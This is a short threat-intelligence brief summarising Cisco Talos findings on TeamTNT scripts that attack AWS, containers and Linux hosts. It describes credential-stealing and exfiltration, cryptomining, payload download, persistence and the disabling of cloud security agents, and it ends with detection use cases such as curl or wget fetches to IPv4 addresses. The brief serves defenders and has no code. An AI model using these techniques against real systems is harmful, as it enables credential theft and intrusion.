TeamTNT Scripts

  |  Source: 

TeamTNT Scripts

Industry: N/A | Level: Tactical | Source: CiscoTalos

Various script files used by the threat group, TeamTNT against AWS and Alibaba have been examined by Cisco Talos. The scripts target Amazon Web Services (AWS), on-premise containers, and some Linux instances. The ability of the scripts varies as they are capable of initiating cryptocurrency mining, credential gathering, downloading additional payloads, modifying file permissions, disabling tools, and achieving persistence and lateral movement. An AWS credential discovery and stealing script "GRABBER_aws_cloud.sh" can enumerate the host's directory, querying for the string AWS. When matches are identified, the script writes the result to a file, exfiltrates the data, and deletes the created file. Scripts downloading payloads often conduct a check on the system's architecture to ensure a compatible script is downloaded for execution. TeamTNT is quite proficient in the cloud space, in addition to the abundance of robust scripts, the group has initiated techniques observed by Trend Micro, Cado Security, and Cisco Talos to disable cloud security and cloud logs. Whilst agents associated with Alibaba, Tencent, and BMC Helix Cloud Security were targeted some omissions have been observed by Cisco Talos, "TeamTNT does not make any attempts to disable the AWS CloudWatch agent, Microsoft Defender, Google Cloud Monitor, Cisco Secure Cloud Analytics, CrowdStrike Falcon, Palo Alto Prisma Cloud, or other common United States cloud security tools."

  • Anvilogic Scenario: Unix File Download, Modified, Executed
  • Anvilogic Use Cases:
  • Locate Credentials
  • Linux CURL or WGET Direct to IPv4 Address
  • File Download (Unix)
  • Rare shell script execution
  • Service Stop Commands
  • Output to File
  • Modify File Attributes
  • New Linux Service Started/Enabled
  • File Modified for Execution
  • File Execution (Unix)
  • New Docker Container

Get trending threats published weekly by the Anvilogic team.

Sign Up Now